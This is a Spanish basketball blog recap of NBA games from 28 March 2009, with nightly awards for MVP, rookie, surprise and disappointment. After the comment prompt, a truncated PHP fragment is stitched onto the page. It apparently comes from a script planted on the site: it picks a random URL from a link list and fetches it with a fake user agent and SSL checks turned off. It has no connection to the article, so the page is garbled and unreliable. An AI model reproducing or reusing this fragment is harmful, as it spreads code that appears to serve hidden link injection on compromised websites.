La Crónica (28/03/2009)

29 de March de 2009 por TheDeerHunter

Si ya solemos tener el tiempo justo para otras jornadas del Saturday’s Night, hoy para colmo tenemos una hora menos y un montón de partidos que comentar.

Partidazo en Salt Lake ante la visita de los Suns. Es casi imposible que un equipo con un 37% de acierto pueda ganar un partido… pero los Suns lo tuvieron en su mano llevando un ritmo demoníaco y lanzando a canasta más de un 20% más que los locales. Tuvieron el partido ganado, pero una serie de incomprensibles errores en el minuto final dió la oportunidad a Okur&Williams de forzar la prórroga, donde supieron administrar bien la ansiedad de sus rivales. Finalmente lo que el caos les ha dado a los Suns va a terminar quitándoselo… pero más en falta echarán ahora a tantos partidos que perdieron encorsetados en aquel autocontrol antinatura o los descansos del Shaq más joven de los últimos años.

No había muchos otros focos de mayor interés anoche. La vuelta de Arenas que estuvo a punto de obrar el milagro de ganar un partido con los Wizards frente a Detroit. Pero coincidió también con la vuelta de Hamilton y si Arenas estuvo bien, el de la universidad de Connecticut estuvo tremendo amarrando una victoria que buena falta les hacía.

El resto de equipos que se jugaban algo no dieron lugar a la sorpresa. Miami superó a Milwaukee, Denver apalizó a los Warriors y Houston y Portland hicieron lo propio con los Clippers y Memphis respectivamente. Mención a parte a la discreta actuación anoche de los españoles.

Por último, estuvieron muy bien los partidos Indiana@Chicago y New York@Charlotte. Larry Brown, tras todos los palos que unos y otros le hemos dado, igualó anoche la mejor temporada de la franquicia… lo cual tampoco quiere decir mucho, pero es indudable que ha logrado dotarle de un carácter propio a ese equipo y armar las bases del futuro inmediato, que es más de lo que nadie ha conseguido. Quede como quede el equipo la temporada es un gran paso adelante.

Lo mismo podemos decir de Chicago y, aunque en su caso el acierto es puntual en los traspasos logrados, la pinta que trasmite en estos momentos es de un equipo de lo más sólido y con amplio margen de mejora. No será fácil batirlos en las eliminatorias. El mejor estado de forma para el momento más importante. Como debe de ser.

PREMIOS

MVP: Podríamos destacar por segunda noche consecutiva a Carmelo, con 31ptos, 5 asistencias, 6 rebotes y un robo pero fue contra los Warriors, que casi no tiene mérito; Gerald Wallace rozó el triple doble con los Bobcats… pero el premio esta noche se lo damos al turco Okur que fue decisivo en un partido complicadísimo y ante el mismísimo Shaq. 26ptos con un 66% en tiro, 11 rebotes, 3 asistencias, 2 tapones y un robo. Partido completito.

Rookie: Estuvo bien Rose, rozando el triple doble en una victoria importante para los Bulls. También funcionó bien Oden aunque sin excesivo acierto en el tiro. Gordon lo hizo bien pero cayó derrotado  con los Clippers, como casi siempre. El mejor rookie de la noche fue Augustine que la armó en los 26 minutos que estuvo en la cancha, 19ptos y 4 asistencias con un único fallo en tiro.

La sorpresa: Sabemos que Gadzuric es un tío currante que lleva muchos años de carrera en la NBA que nadie le ha regalado… pero que difícil es verle dar bailes como el que le dio anoche a Jermaine O’neal en el mismísimo American Airlines de Miami. 18 ptos y 12 rebotes que no fueron suficientes para darle la victoria a su equipo. Si Villanueva hubiera estado la mitad de bien que él…

La decepción: Impresionante duelo de decepciones en Charlotte. Larry Hughes empezó bien con los Knicks pero anoche hizo 8 ptos en un parcial de -21 con él en pista. En frente, terrorífico Raymon Felton con 3-17 en tiros (anda que se cortó el tío). Vaya dos, cogiditos de la mano.

El mayor esfuerzo en vano: Los 61 ptos que anotaron entre Granger y Brandon Rush en la derrota de Indiana serían para echarse a llorar si no fuera porque Granger está más que acostumbrado a aparecer en esta categoría y Rush lo de esforzarse es un decir, que en defensa ni lo intentó.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>